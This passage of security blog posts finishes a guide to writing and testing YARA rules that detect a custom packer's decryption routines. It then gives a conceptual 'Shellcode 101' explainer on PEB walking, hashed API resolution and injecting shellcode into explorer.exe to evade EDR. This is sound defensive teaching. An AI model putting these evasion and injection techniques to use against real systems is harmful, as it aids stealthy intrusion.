    The tail tells you what kind of function this is. push 20h fixes the output length at 32 bytes. The stack-based buffer, explicit null termination, and the call to memcpy leave little ambiguity about the goal – something opaque goes in & a usable string comes out. The cleanup and return simply end the function.

    ?? wildcards

    Offsets, stack layout, and call targets shift between builds. You wildcard those and keep what reflects intent: constants, instruction order, and data flow. That’s how you avoid brittle, one-sample rules.

    Testing the Rule: From Grep to Retro Hunt

    Before I let this anywhere near a real scan, I want one boring answer: does it light up on clean software? Opcode-level rules can be sharp, but they can also turn generic fast if you accidentally anchor on common compiler output.

    So the first pass is intentionally crude. A grep-style content search on VirusTotal over the byte windows I actually care about:

    Figure 19. A quick VT grep-style sweep over the opcode anchors to sanity-check noise—zero/few hits on clean PE files is exactly the signal you want before moving forward.

    A result like positives: 0 is exactly what you want at this stage. It doesn’t prove the rule is “correct,” but it does tell you something important: these anchors aren’t just matching random compiler soup across benign PE files. If this search came back with dozens or hundreds of hits, that’s an immediate red flag—the pattern is too loose, or you latched onto something common.

    Only if the search hits a very small number of clean files does hardening even enter the picture. At that point, the goal isn’t to pile on more opcode bytes. Bytes are expensive—every extra pattern makes the rule more brittle and more sample-specific. Good hardening reduces false positives without collapsing the rule into a single hash.

    A few practical knobs that usually help when refinement is actually needed:

    File size gates. Packers and small loaders tend to live in narrow size bands. A simple filesize < X or bounded range can drop noise fast.

    Structurally unavoidable strings. If the only plaintext left is import-related API names, use that. Even lightweight checks for things like FindResource, LoadResource, SizeofResource, VirtualProtect, or WriteProcessMemory can separate loaders from normal applications without relying on missing config strings.

    Section-scoped scanning. Don’t hunt these bytes across the entire file. Restricting matches to .text section avoids coincidences in overlays or high-entropy resource blobs.

    Location constraints. If the routine consistently appears near the start of .text or within a tight window relative to the entry point, encode that habit. You’re not looking for “anywhere in the binary.”

    PE shape hints. Section count, section sizes, presence or absence of a security directory—none of these are signatures on their own, but they make excellent tie-breakers.

    Figure 20. VirusTotal Livehunt Retrohunt editor for authoring YARA rules and running historical hunts across selected corpora and time ranges. Source: docs.virustotal.com

    When the grep finally stays quiet, the rule graduates to its real exam: Retrohunt. But it doesn’t run just once. The exact same YARA is executed twice, against two very different populations. The first run goes against a goodware-biased corpus, where the only thing you’re testing is restraint—does the rule remain silent in a world full of installers, signed binaries, and boring software that just does its job? The second run goes against VirusTotal’s default corpus, where the noise returns and the question flips. Now you’re looking to see what else lights up. Not clones of your sample, but binaries that carry the same decryptor logic buried under different skins. At this stage, you’re no longer asking whether the rule works. You’re asking whether it understands the behavior it’s trying to describe.

    A good rule begins to surface siblings that reuse the same routine, even if everything else around it has shifted. A weak rule just describes one binary very precisely and nothing more. Retro hunts make that difference obvious very quickly. If you want to dig deeper into how VirusTotal’s RetroHunt works and how to run these searches effectively, the official documentation covers it in detail: https://docs.virustotal.com/docs/retrohunt.

    Alongside this external testing, it’s worth remembering that most security teams aren’t relying on VirusTotal alone. AV vendors, EDR teams, and internal detection groups usually run their own quality gates before anything ships. Rules get exercised against large cleanware corpora, regression sets, and performance testbeds to make sure they don’t light up on legitimate software or introduce scan-time overhead. False positives and slow rules are caught long before production.

    Retro hunts are a way to sanity-check intent and coverage from the outside. Internal QA systems exist to do the unglamorous work at scale—proving that a rule is quiet, fast, and safe once it leaves the lab.

    Custom Packer Logic: Payload Decryption Rule

    Up to this point, everything we’ve seen has lived in the world of string decryption—small, repeatable routines cleaning up literals just in time for use. This block is where the scope changes. During initial static analysis in Detect It Easy, the resource section already stood out as compressed, so when scrolling through main and execution drops into a run of FindResource → LoadResource → LockResource calls, it’s a natural place to stop and look closer. What’s being pulled here isn’t just data—it’s a packed payload lifted straight out of .rsrc, staged in memory, and processed inside a do { … } while (…) loop via repeated calls to sub_401560, chewing through the buffer chunk by chunk. The final transformation happens in sub_40AC60, where the last pass transforms the extracted resource into its usable form. This is the point where the packer moves beyond string cleanup and reconstructs the real body of the sample.

    Figure 21. Native loader lifting an encrypted payload from resources and rebuilding it in memory.

    Figure 22. Final unpacking stage: sub_40AC60 reconstructs a .NET PE payload in memory, with EDI pointing at the newly materialized output buffer.

    Even before we follow execution into sub_40AC60 (where the final payload transform lands), it’s worth pausing on sub_401560—because this is the “workhorse” that keeps getting hammered inside that do/while pipeline.

    At a high level, sub_401560 is a table-driven byte mixer. It copies the input buffer to an output buffer, then rewrites the bytes using a 256×256 lookup table (sitting at this + 0x10000). But it’s not a simple byte-substitution: each byte’s replacement is keyed off a neighbor byte (next/previous), plus a small seed value stored at this[131104].

    • If the chunk is 1 byte, it does a single lookup keyed by that seed.
    • If it’s larger, it runs a forward pass (byte + next-byte), does a special keyed transform on the last byte (seed XOR 0x55), then runs a backward pass (byte + prev-byte), and finally re-writes the first byte again using the seed.

    Net effect: it turns the buffer into a chained stream transform—each byte is influenced by its neighbors—so by the time we reach sub_40AC60, we’re not looking at “raw extracted resource data” anymore, we’re looking at something that’s already been aggressively stirred.

    Figure 23. The IDA pseudocode for sub_401560 showing the chained mixing behavior.

    Figure 24. Python reimplementation of sub_401560, applying a chained 256×256 table-driven byte transform to an input buffer.

    What stands out about sub_401560 is that it doesn’t look like any standard algorithm. The table lookups and neighbor-based chaining give it a very specific shape, which means the function itself is distinctive. That makes it a solid candidate for YARA-based detection: not because it’s sophisticated crypto, but because it’s custom, repeatable, and easy to recognize once you know what to look for.

    Figure 25. Sample YARA rule illustrating opcode-level detection of the sub_401560 table-chained byte mixer.

    Let’s look at how this rule is put together. Rather than trying to describe the entire function byte-for-byte, the rule anchors itself on a few deliberate checkpoints that reflect intent. These anchors line up with the main stages of the transform: setup, forward mixing, a special last-byte step, and the backward mix. We’ll walk through the $head, $fwd, $last, and $bwd sequences in turn, and why each one was chosen.

    $head

    The opening bytes aren’t interesting because they save registers or set up a stack frame. They matter because of what happens immediately after. The function copies an input buffer with memcpy, checks the size, and branches early if the length is one byte.

    That combination—bulk copy followed by byte-wise handling—is the first signal that this isn’t a standard crypto primitive or library routine. The size check and conditional jump establish the structure of the function, while the register usage (edi as the table/state pointer, esi as the output buffer) stays consistent across builds.

    This anchor tells us what kind of routine we’re in before any mixing logic even begins.

    $fwd

    The forward pass is where the behavior becomes distinctive. Each byte is rewritten using a lookup that depends on the next byte, not just its own value. The sequence of movzx, add 0x100, shl 8, and indexed table access isn’t incidental math—it’s how the code walks a 256×256 lookup table.

    This pattern is unlikely to appear in benign code by accident, and it doesn’t resemble common encoders or stream ciphers. Anchoring here captures the neighbor-dependent mixing that defines the routine.

    $last

    The last byte is handled differently, and that difference is deliberate. Instead of using a neighboring byte, the code mixes in a fixed seed value read from [edi+0x20020], XORed with 0x55, before performing the table lookup.

    This isn’t cleanup logic or bounds handling—it’s a special case baked into the transform. That makes it a strong discriminator: seeing this exact sequence strongly suggests you’re looking at the same routine.

    $bwd

    The backward pass runs the same table logic again, but this time it walks the buffer in reverse, pulling in the previous byte instead of the next one. That’s what gives the routine its full shape: a forward sweep, a one-off tweak at the end, and then a second pass back through the data.

    Anchoring on this loop helps keep the rule honest. Plenty of code uses a single table-based pass; very little code does it twice, in opposite directions, with the same lookup mechanics. Requiring both $fwd and $bwd makes sure we’re matching the whole transform, not just a convenient slice of it.

    As mentioned earlier, the next stage is to start testing the rule. Run a quick grep-style search, follow it up with a retrohunt to see what else the rule pulls in, and validate it against cleanware. From there, adjust the anchors, wildcards, and conditions as needed to balance performance and false positives before using it in any real pipeline.

    Detection Considerations for Non-Custom Packers

    This kind of opcode-level logic does not translate directly to common, non-custom packers like UPX, ASPack, or similar tools that are routinely used by legitimate software. Writing a static YARA rule against the unpacking stub of these packers will almost always produce false positives, because the stub is shared across thousands of clean binaries.

    In those cases, the packer itself is not the signal. It only becomes relevant when it’s paired with malicious behavior downstream.

    To handle this, most AV and EDR engines don’t scan the packed bytes in isolation. Instead, they unpack the file first—either through emulation or during execution—and then apply static and behavioral detection to the unpacked code. That’s where rules become meaningful: they match on the post-unpack logic, not the generic wrapper.

    The trade-off is performance. Unpacking, emulating, and rescanning code is significantly heavier than a straight static scan. Engines have to decide when that cost is justified, which is why generic packers are usually tolerated unless other signals push the file down a deeper inspection path.

    Custom packers don’t get that treatment. Their unpacking logic is unique, reusable across samples, and tightly coupled to the malware itself—making function-level static detection both safer and cheaper in comparison.

    We’ll stop here for now. Part 2 will look at detection once known encryption algorithms replace custom routines.

    References

    VirusTotal Documentation – https://docs.virustotal.com/

    YARA Documentation – https://yara.readthedocs.io/en/latest/

    VirusShare – https://virusshare.com/

  • Shellcode 101: A Beginner’s Guide to Windows Shellcode

    Author: Valli-Nayagam Chokkalingam

    Instead of walking through shellcode generation, this post explains how shellcode executes, why it is position independent, and what that means in practice.

    Contents

    Starting With Something Familiar

    On Windows, running a program is usually uneventful. There’s a file on disk, you double-click it, and the application shows up. A window opens, something visible happens, and you don’t really think about it any further.

    Even when a program does almost nothing—like opening Notepad or Calculator—the flow feels obvious. The executable runs, the OS takes over, and the result appears. Whatever happens in between is mostly invisible, and most of the time that’s fine.

    That “normal” experience quietly sets expectations. We get used to the idea that programs start from files, that the operating system handles the heavy lifting, and that execution just works because everything is already in place. For this post, that familiar model is the starting point—not because it’s interesting, but because it’s the set of assumptions everything else will eventually break.

    Figure 1. Execution of a custom Windows executable resulting in the launch of notepad.exe as a visible indicator of successful code execution.

    A Simple Program That Launches an Application

    The executable shown in Figure 1 does one straightforward thing: it launches notepad.exe and exits. There’s no complex logic and no visible setup. The corresponding code, shown in Figure 2, reflects that simplicity.

    That simplicity is misleading. By the time this program runs, a lot has already happened. A process exists, memory has been prepared, and system functionality is ready to be used. The program can make a single request and expect it to work because it is running inside an environment that has already been set up.

    None of that setup appears in the code. There’s no handling for how the executable is loaded, how dependencies are resolved, or how execution is initialized. Those details are handled elsewhere, allowing the program to stay small and readable. Understanding where that work happens—and what assumptions it creates—is the next step.

    Figure 2. C source code of the custom executable responsible for launching notepad.exe.

    What Windows Does for an Executable Behind the Scenes

    Launching an executable doesn’t mean Windows immediately starts running its code. The file is first treated as something that needs to be understood and prepared.

    When you run Launch Notepad.exe (Figure 1), it doesn’t start instantly — behind the scenes, the loader performs several setup steps, illustrated in Figure 3, to prepare the program for execution. Windows recognizes the file as a Portable Executable and maps it into memory in a structured way. Sections are placed where they belong, a process is created, and space is carved out for the program to run. At this point, nothing from the application itself has executed yet.

    Windows also deals with anything the program depends on. Required DLLs are loaded, and imported functions are resolved ahead of time. By the time execution reaches the program’s entry point, calls to system APIs already work. The code doesn’t need to locate them or check whether they exist.

    Most of this work stays out of sight, which is why it’s easy to forget it’s happening at all. A file on disk is turned into a running process with very little effort from the developer. Those guarantees are what normal Windows programs rely on—and they’re exactly the things that disappear once the loader and executable structure are no longer part of the picture.

    Figure 3. High-level view of the steps performed by Windows to load a Portable Executable into memory before execution begins.

    What If We Want the Result Without the Executable?

    Sometimes dropping an executable just isn’t worth the noise. Writing a payload to disk leaves a trail—something for EDR to watch, something for forensics to recover later. In Figure 4, the contrast is clear: a malware executable dropping Launch Notepad.exe to disk versus achieving the exact same result by executing shellcode injected into an existing process like explorer.exe.

    The outcome doesn’t change. Notepad still opens. What changes is how much machinery is involved. With shellcode, there’s no secondary executable, no loader for a new file, and no obvious payload artifact left behind. It’s just raw instructions placed directly into memory, executed where they land.

    By reusing a legitimate process and skipping the file drop entirely, execution blends into normal system activity. The functionality is identical, but the footprint is smaller and the signal is quieter. That difference is why shellcode exists—and why attackers keep reaching for it.

    Figure 4. Comparison of executable-based and shellcode-based execution paths leading to the same result.

    Execution Without a Loader

    As shown in Figure 3, normal execution on Windows flows through the loader. A file is read from disk, its structure is understood, memory is prepared, and only then does execution begin. That path is so common it feels invisible.

    Shellcode steps outside of it. There is no executable file to load and no loader preparing the ground first. The operating system never treats the code as a program. Execution starts directly from memory, wherever those instructions happen to be placed.

    That difference matters. Without the loader, there’s no structured layout waiting in memory and no guarantees about what’s available. The code runs inside an existing process context and works with whatever state already exists there. Nothing is resolved ahead of time.

    Figure 5 shows this contrast clearly. On one side, execution depends on the loader to turn a file into something runnable. On the other, execution happens without that preparation step at all. The result can look the same from the outside, but the path taken to get there is very different.

    This is the tradeoff shellcode accepts. Less structure. Less comfort. But also less surface area. By avoiding the loader entirely, execution becomes quieter, and that shift is what defines running without one.

    Figure 5. Comparison of loader-based execution and direct execution from memory.

    Why Shellcode Cannot Rely on Structure or Location

    Shellcode doesn’t start life as a program. When execution begins, it’s already inside a process, dropped into memory with none of the usual guarantees in place.

    The first point of entry is shown in Figure 6. This is where control reaches the shellcode. There are no imports to lean on and no fixed addresses to trust. The code begins by setting up a small working state and deciding what it needs to find next. One of the first things prepared is a hash identifying the module it wants to locate.

    Next comes the module lookup, shown in Figure 7. Here, the shellcode walks the loader structures exposed through the PEB. Each loaded module is checked in turn. A hash match identifies the module and yields its base address. In this case, that module is kernel32.dll. This replaces what the loader normally does when it maps dependent DLLs.

    Figure 6. High-level view of the shellcode routine: locating kernel32.dll, resolving WinExec, and invoking it with stack-based arguments.

    Figure 7. Shellcode traversing loader-linked module data via the PEB to identify the target DLL using a hashed name comparison.

    Once the module base is known, execution still isn’t ready to transfer control anywhere meaningful. A loaded DLL doesn’t provide function addresses on its own. That work normally comes from the import table, and here it has to be reconstructed manually.

    Figure 8 shows the first half of that process. Using the base address of kernel32.dll, the shellcode walks the export directory directly. Exported function names are read from memory and processed one by one, each passed through the same hashing logic used earlier. This stage is about identification, not execution — narrowing down which export corresponds to the function the shellcode wants.

    Figure 9 picks up from there. Once the correct export name (in this case it’s WinExec) is identified, its ordinal value is used to index into the address table. That final lookup produces the actual virtual address of the WinExec API. The shellcode now holds a real, callable address inside the target module.

    By the time Figure 9 completes, the end result mirrors what an import table would normally provide. The address of WinExec is resolved and ready to be called, even though no executable structure was involved and the loader never ran. Figure 10 shows what this would have looked like in a conventional executable (Launch Notepad.exe), where the same API is resolved ahead of time and recorded explicitly in the import table instead of being rebuilt at runtime.

    Figure 8. Traversing the export directory of kernel32.dll to identify the target API name (WinExec) using hash comparison.

    Figure 9. Resolving the virtual address of WinExec by mapping the matched export name through its ordinal and address tables.

    Figure 10. Import table of the corresponding executable (Launch Notepad.exe), showing KERNEL32.dll and the WinExec API resolved by the loader.

    Why Shellcode Ends Up Being Assembly

    By this point, the form shellcode takes should already feel familiar. In Figures 6 through 9, IDA never shows a program in the usual sense. What’s visible is a direct disassembly of bytes sitting in memory.

    That’s not a tooling artifact. It’s the reality of what shellcode is.

    Shellcode doesn’t start life as a program Windows recognizes. There’s no file format to parse, no headers to interpret, and no symbols to resolve. A jump lands somewhere in memory, and from that moment on the only meaningful interpretation of those bytes is as CPU instructions.

    This is why everything we’ve examined lives at the instruction level. IDA isn’t reconstructing structure or intent in Figures 6, 7, 8, and 9. It’s simply translating raw opcodes into assembly, one instruction at a time. There’s nothing above that layer to rely on.

    Higher-level languages assume a loader, a runtime, and a stable execution context. Shellcode gets none of that. It executes where it lands, adapts to the process it’s in, and avoids assumptions about layout or location.

    Assembly fits those constraints cleanly. It’s explicit, position-agnostic, and honest about what the code is doing. When shellcode is disassembled, assembly isn’t a side effect — it’s the code in its most direct form.

    Proof of Execution Without a Program

    At this point, execution isn’t something we infer. It’s something we can see.

    The screenshot in this section (Figure 11) show the shellcode bytes resident inside the memory of explorer.exe. There is no executable on disk corresponding to this code. Nothing was launched, mapped, or registered as a program. The bytes exist only in memory, inside a process that was already running.

    Yet execution still occurred. The shellcode ran, resolved what it needed, and produced a visible result. That alone is the point being made here.

    This is what execution without a program looks like in practice. No file-backed image. No loader activity tied to a new process. Just instructions placed into memory and control transferred to them. From the operating system’s perspective, there is no new application to account for — only behavior happening inside an existing one.

    Seeing the bytes in memory closes the loop. It confirms that everything discussed earlier is not theoretical. The code ran where it was injected, using the context it found, without ever becoming a program in the conventional sense.

    Figure 11. Shellcode bytes executing from a private, executable memory region inside explorer.exe, without any loaded executable.

    That’s where we’ll leave it for now. More to come soon!